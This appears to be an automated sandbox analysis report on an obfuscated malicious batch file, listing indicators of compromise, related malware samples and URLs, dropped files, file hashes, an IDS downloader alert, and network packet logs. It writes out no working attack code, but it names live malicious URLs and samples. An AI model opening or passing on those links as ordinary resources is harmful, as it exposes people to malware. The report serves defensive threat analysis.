                                                                                                                                                                                        protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                        https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                        FW Reminder Steve Daugherty shared ALAMO1 _ AGREEMENT.paper with you.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 162.125.67.18

                                                                                                                                                                                        ASNs

                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        http://www.employee-ratings.com/107519/fab30a/abf4a385-1883-4e57-8ade-771c19e19962Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                        https://app.powerbi.com/view?r=eyJrIjoiNjcyNzQ5NzAtNzgyNy00ZWU4LWI0YmEtNWI2ZTg2NjRlMzE2IiwidCI6ImJkMWRiODMyLWYwY2QtNDRiNS04ZTNjLTYxMmNlY2NhMjQ4ZSJ9&dp=688235Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 104.21.94.71
                                                                                                                                                                                        #U051d==.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 104.17.25.14
                                                                                                                                                                                        Unlock_Tool_v2.6.5.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                        https://listonelove.buzz/zoom/zoommm.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 104.21.90.224
                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                        DROPBOXUS2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        13jhsfbose.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        https://www.dropbox.com/l/scl/AABC0x3zULW7L39lSlgXhTBIyuorli3cJh8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 162.125.1.20
                                                                                                                                                                                        protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                        meerkat.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                        • 162.125.189.88
                                                                                                                                                                                        https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                                                                                                                                                                                        • 162.125.67.15

                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eLzmJLVB41K.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        13jhsfbose.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        kQ3WxQb6bw.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        36yw96m7Ni.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        • 162.125.66.18

                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                        No context

                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                        Entropy (8bit):0.6599547231656377
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Nlllulmll:NllU
                                                                                                                                                                                        MD5:8238A428604DFCBB76A63390CD65BBDE
                                                                                                                                                                                        SHA1:A4DA8D52DFE36DEB522DCAE7654E94B2F8391A57
                                                                                                                                                                                        SHA-256:E8E3F8A61FAA25DC1F29646A3E573345812BC15720CFC195094D9AD37C82A012
                                                                                                                                                                                        SHA-512:061B3CCBA39A1E40BDF95D1D612B220B9C3C395DCC3249E9D03AF0B5ED92AAF770127849CBE0C5E41BEA342C54368E2294EA775DC37F5239DFAF4DBB557E79AE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:@...e...........................................................

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xfixk1r.an2.ps1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bb3uxrsn.sz5.psm1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfsnknkt.zbr.psm1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwmjl3dl.n5q.psm1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngz5xqca.x3r.ps1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qyh31vil.uv1.ps1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rj1ip14a.nlh.ps1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rurk3zrg.q1o.ps1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tiyygag2.5je.psm1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbynhwao.tgc.psm1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\Desktop\tmp

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):14
                                                                                                                                                                                        Entropy (8bit):3.521640636343319
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Mrv:gv
                                                                                                                                                                                        MD5:CE585C6BA32AC17652D2345118536F9C
                                                                                                                                                                                        SHA1:BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
                                                                                                                                                                                        SHA-256:589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
                                                                                                                                                                                        SHA-512:D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:ECHO is off...

                                                                                                                                                                                        \Device\Null

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\find.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):36
                                                                                                                                                                                        Entropy (8bit):3.8956388075276664
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:gOmAe9qQn:xm/
                                                                                                                                                                                        MD5:89D484A82D15549C8F4BF2B4D4F1E924
                                                                                                                                                                                        SHA1:58F49E997A58A17C2902E08026BAC2DD16A34B1B
                                                                                                                                                                                        SHA-256:040AE1183CD6102AC612B2D88C2816B358FDC4743BC9CD05376E797595167B40
                                                                                                                                                                                        SHA-512:C0C920A9369FF9E28C9DAE6CA21AE7A1F9A79F2F4F8F97E247D133700FC446CEAA2C6C40116DE644CEA9336D9064792F3AD7011EBCBF5B6675779C57590F167B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:FIND: Parameter format not correct..

                                                                                                                                                                                        Static File Info

                                                                                                                                                                                        General

                                                                                                                                                                                        File type:Non-ISO extended-ASCII text, with very long lines (1406), with LF, NEL line terminators, with escape sequences
                                                                                                                                                                                        Entropy (8bit):5.555052378289107
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • MP3 audio (1001/1) 100.00%
                                                                                                                                                                                        File name:hnl2bose13.bat
                                                                                                                                                                                        File size:34'657 bytes
                                                                                                                                                                                        MD5:a004836443420d9b08b715e5757afb5a
                                                                                                                                                                                        SHA1:11a2c48f70ce60ee145cf243173791099212082d
                                                                                                                                                                                        SHA256:6bf5abcdd7110ce950b92f4128c16e52cd2c9401f69955c1b112958ee64bcb0e
                                                                                                                                                                                        SHA512:775aa1d7985178705c290442e15376c8822427e6009dca35a80bce86f18150018694b243bdd8580d623c3b82a20dd09125c6d3ceceed6316ad95b124a212c595
                                                                                                                                                                                        SSDEEP:768:PhdZstnxvY4SqA1g+pXLN/H9Ayx1FTDl2PXg:dEAqy+yx1FTDl2PXg
                                                                                                                                                                                        TLSH:3DF2B3021A036EAE209C9734DA6E60B23CD358BD307FD176B53A3D1F9FE05158626E67
                                                                                                                                                                                        File Content Preview:....>nul 2>&1 &cls.@@ech^%(.........)...(......_...)...(.........)(........)...(......_...)......( ..._...)^...%%...( ..._...)......( ..._...)...(.........)(.........)...( ..._...)...(^.........)%%...(......_...)...(.........)(........)...( ..._...)...(..

                                                                                                                                                                                        File Icon

                                                                                                                                                                                        Icon Hash:9686878b929a9886

                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                        2024-11-18T09:56:12.487269+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649729172.65.251.78443TCP

                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Nov 18, 2024 09:56:03.780821085 CET49710443192.168.2.6162.125.66.18
                                                                                                                                                                                        Nov 18, 2024 09:56:03.780852079 CET44349710162.125.66.18192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:03.780922890 CET49710443192.168.2.6162.125.66.18
                                                                                                                                                                                        Nov 18, 2024 09:56:03.789753914 CET49710443192.168.2.6162.125.66.18
                                                                                                                                                                                        Nov 18, 2024 09:56:03.789766073 CET44349710162.125.66.18192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:04.638597965 CET44349710162.125.66.18192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:04.638680935 CET49710443192.168.2.6162.125.66.18
                                                                                                                                                                                        Nov 18, 2024 09:56:04.641351938 CET49710443192.168.2.6162.125.66.18
                                                                                                                                                                                        Nov 18, 2024 09:56:04.641366005 CET44349710162.125.66.18192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:04.641836882 CET44349710162.125.66.18192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:04.654721022 CET49710443192.168.2.6162.125.66.18
                                                                                                                                                                                        Nov 18, 2024 09:56:04.695329905 CET44349710162.125.66.18192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:05.722270966 CET44349710162.125.66.18192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:05.722347021 CET44349710162.125.66.18192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:05.722476959 CET49710443192.168.2.6162.125.66.18
                                                                                                                                                                                        Nov 18, 2024 09:56:05.722476959 CET49710443192.168.2.6162.125.66.18
                                                                                                                                                                                        Nov 18, 2024 09:56:05.728079081 CET49710443192.168.2.6162.125.66.18
                                                                                                                                                                                        Nov 18, 2024 09:56:10.883127928 CET49722443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:10.883188963 CET44349722172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:10.883686066 CET49722443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:10.886749029 CET49722443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:10.886770010 CET44349722172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.496414900 CET44349722172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.496507883 CET49722443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.498589039 CET49722443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.498600960 CET44349722172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.498925924 CET44349722172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.505669117 CET49722443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.551332951 CET44349722172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.720932007 CET44349722172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.720997095 CET44349722172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.721055984 CET44349722172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.721100092 CET49722443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.721129894 CET44349722172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.721146107 CET44349722172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.721174002 CET49722443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.721204042 CET49722443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.722301006 CET49722443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.723022938 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.723124981 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.723229885 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.723470926 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.723511934 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.338264942 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.344731092 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:12.344815016 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.486928940 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487009048 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487042904 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487071991 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487104893 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487135887 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487159967 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487188101 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487262964 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487294912 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487302065 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487344980 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487368107 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:12.584896088 CET49729443192.168.2.6172.65.251.78

                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Nov 18, 2024 09:56:03.765657902 CET5319653192.168.2.61.1.1.1
                                                                                                                                                                                        Nov 18, 2024 09:56:03.773993969 CET53531961.1.1.1192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:05.729635000 CET6324353192.168.2.61.1.1.1
                                                                                                                                                                                        Nov 18, 2024 09:56:05.749852896 CET53632431.1.1.1192.168.2.6
